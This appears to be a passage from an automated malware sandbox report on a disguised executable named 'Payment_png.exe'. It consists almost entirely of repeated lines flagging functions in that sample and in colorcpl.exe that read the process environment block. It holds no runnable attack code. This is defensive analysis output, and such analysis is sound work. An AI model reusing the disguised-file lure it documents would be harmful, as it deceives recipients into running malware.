Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA229 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA229
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]	2_2_1E3C3A1C
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E45B260 mov eax, dword ptr fs:[00000030h]	2_2_1E45B260
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E45B260 mov eax, dword ptr fs:[00000030h]	2_2_1E45B260
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E478A62 mov eax, dword ptr fs:[00000030h]	2_2_1E478A62
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]	2_2_1E3A5210
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]	2_2_1E3A5210
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]	2_2_1E3A5210
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A5210 mov eax, dword ptr fs:[00000030h]	2_2_1E3A5210
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]	2_2_1E3AAA16
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]	2_2_1E3AAA16
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]	2_2_1E3B8A0A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E927A mov eax, dword ptr fs:[00000030h]	2_2_1E3E927A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46AA16 mov eax, dword ptr fs:[00000030h]	2_2_1E46AA16
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46AA16 mov eax, dword ptr fs:[00000030h]	2_2_1E46AA16
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9240
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9240
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9240
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9240
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]	2_2_1E3BAAB0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]	2_2_1E3BAAB0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]	2_2_1E3DFAB0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	2_2_1E3A52A5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	2_2_1E3A52A5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	2_2_1E3A52A5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	2_2_1E3A52A5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	2_2_1E3A52A5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DD294 mov eax, dword ptr fs:[00000030h]	2_2_1E3DD294
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DD294 mov eax, dword ptr fs:[00000030h]	2_2_1E3DD294
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E464AEF mov eax, dword ptr fs:[00000030h]	2_2_1E464AEF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]	2_2_1E3D2AE4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]	2_2_1E3D2ACB
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E478B58 mov eax, dword ptr fs:[00000030h]	2_2_1E478B58
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA309 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA309
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]	2_2_1E3D3B7A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]	2_2_1E3D3B7A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]	2_2_1E3ADB60
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46131B mov eax, dword ptr fs:[00000030h]	2_2_1E46131B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AF358 mov eax, dword ptr fs:[00000030h]	2_2_1E3AF358
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]	2_2_1E3ADB40
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4253CA mov eax, dword ptr fs:[00000030h]	2_2_1E4253CA
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4253CA mov eax, dword ptr fs:[00000030h]	2_2_1E4253CA
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]	2_2_1E3D4BAD
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]	2_2_1E3D4BAD
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]	2_2_1E3D4BAD
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4523E3 mov ecx, dword ptr fs:[00000030h]	2_2_1E4523E3
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4523E3 mov ecx, dword ptr fs:[00000030h]	2_2_1E4523E3
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4523E3 mov eax, dword ptr fs:[00000030h]	2_2_1E4523E3
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2397 mov eax, dword ptr fs:[00000030h]	2_2_1E3D2397
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DB390 mov eax, dword ptr fs:[00000030h]	2_2_1E3DB390
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]	2_2_1E3B1B8F
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]	2_2_1E3B1B8F
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]	2_2_1E3D138B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]	2_2_1E3D138B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D138B mov eax, dword ptr fs:[00000030h]	2_2_1E3D138B
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E45D380 mov ecx, dword ptr fs:[00000030h]	2_2_1E45D380
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E46138A mov eax, dword ptr fs:[00000030h]	2_2_1E46138A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]	2_2_1E3CDBE9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	2_2_1E3D03E2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	2_2_1E3D03E2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	2_2_1E3D03E2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	2_2_1E3D03E2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	2_2_1E3D03E2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	2_2_1E3D03E2
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E475BA5 mov eax, dword ptr fs:[00000030h]	2_2_1E475BA5
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA830
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA830
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA830
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CA830 mov eax, dword ptr fs:[00000030h]	2_2_1E3CA830
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]	2_2_1E3D002D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]	2_2_1E3D002D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]	2_2_1E3D002D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]	2_2_1E3D002D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D002D mov eax, dword ptr fs:[00000030h]	2_2_1E3D002D
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	2_2_1E3BB02A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	2_2_1E3BB02A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	2_2_1E3BB02A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	2_2_1E3BB02A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E471074 mov eax, dword ptr fs:[00000030h]	2_2_1E471074
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E462073 mov eax, dword ptr fs:[00000030h]	2_2_1E462073
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E474015 mov eax, dword ptr fs:[00000030h]	2_2_1E474015
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E474015 mov eax, dword ptr fs:[00000030h]	2_2_1E474015
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]	2_2_1E427016
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]	2_2_1E427016
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E427016 mov eax, dword ptr fs:[00000030h]	2_2_1E427016
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C0050 mov eax, dword ptr fs:[00000030h]	2_2_1E3C0050
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C0050 mov eax, dword ptr fs:[00000030h]	2_2_1E3C0050
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3DF0BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]	2_2_1E3DF0BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]	2_2_1E3DF0BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3E90AF mov eax, dword ptr fs:[00000030h]	2_2_1E3E90AF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	2_2_1E43B8D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]	2_2_1E43B8D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	2_2_1E43B8D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	2_2_1E43B8D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	2_2_1E43B8D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	2_2_1E43B8D0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D20A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9080 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9080
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E423884 mov eax, dword ptr fs:[00000030h]	2_2_1E423884
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E423884 mov eax, dword ptr fs:[00000030h]	2_2_1E423884
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A58EC mov eax, dword ptr fs:[00000030h]	2_2_1E3A58EC
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB8E4 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB8E4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB8E4 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB8E4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]	2_2_1E3A40E1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]	2_2_1E3A40E1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A40E1 mov eax, dword ptr fs:[00000030h]	2_2_1E3A40E1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D513A mov eax, dword ptr fs:[00000030h]	2_2_1E3D513A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D513A mov eax, dword ptr fs:[00000030h]	2_2_1E3D513A
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	2_2_1E3C4120
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	2_2_1E3C4120
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	2_2_1E3C4120
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C4120 mov eax, dword ptr fs:[00000030h]	2_2_1E3C4120
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C4120 mov ecx, dword ptr fs:[00000030h]	2_2_1E3C4120
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9100
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9100
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3A9100 mov eax, dword ptr fs:[00000030h]	2_2_1E3A9100
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AB171 mov eax, dword ptr fs:[00000030h]	2_2_1E3AB171
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AB171 mov eax, dword ptr fs:[00000030h]	2_2_1E3AB171
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AC962 mov eax, dword ptr fs:[00000030h]	2_2_1E3AC962
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB944 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB944
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CB944 mov eax, dword ptr fs:[00000030h]	2_2_1E3CB944
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov ecx, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3C99BF mov eax, dword ptr fs:[00000030h]	2_2_1E3C99BF
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D61A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D61A0 mov eax, dword ptr fs:[00000030h]	2_2_1E3D61A0
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4341E8 mov eax, dword ptr fs:[00000030h]	2_2_1E4341E8
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3D2990 mov eax, dword ptr fs:[00000030h]	2_2_1E3D2990
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3DA185 mov eax, dword ptr fs:[00000030h]	2_2_1E3DA185
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3CC182 mov eax, dword ptr fs:[00000030h]	2_2_1E3CC182
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]	2_2_1E3AB1E1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]	2_2_1E3AB1E1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E3AB1E1 mov eax, dword ptr fs:[00000030h]	2_2_1E3AB1E1
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]	2_2_1E4649A4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]	2_2_1E4649A4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]	2_2_1E4649A4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4649A4 mov eax, dword ptr fs:[00000030h]	2_2_1E4649A4
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4269A6 mov eax, dword ptr fs:[00000030h]	2_2_1E4269A6
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]	2_2_1E4251BE
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]	2_2_1E4251BE
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]	2_2_1E4251BE
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_1E4251BE mov eax, dword ptr fs:[00000030h]	2_2_1E4251BE
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00564377 mov eax, dword ptr fs:[00000030h]	2_2_00564377
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00564B11 mov eax, dword ptr fs:[00000030h]	2_2_00564B11
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00563BE9 mov eax, dword ptr fs:[00000030h]	2_2_00563BE9
Source: C:\Users\user\Desktop\Payment_png.exe	Code function: 2_2_00562410 mov eax, dword ptr fs:[00000030h]	2_2_00562410
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CD8CD6 mov eax, dword ptr fs:[00000030h]	14_2_04CD8CD6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC14FB mov eax, dword ptr fs:[00000030h]	14_2_04CC14FB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]	14_2_04C86CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]	14_2_04C86CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C86CF0 mov eax, dword ptr fs:[00000030h]	14_2_04C86CF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04C1849B mov eax, dword ptr fs:[00000030h]	14_2_04C1849B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 14_2_04CC4496 mov eax, dword ptr fs:[00000030h]	14_2_04CC4496
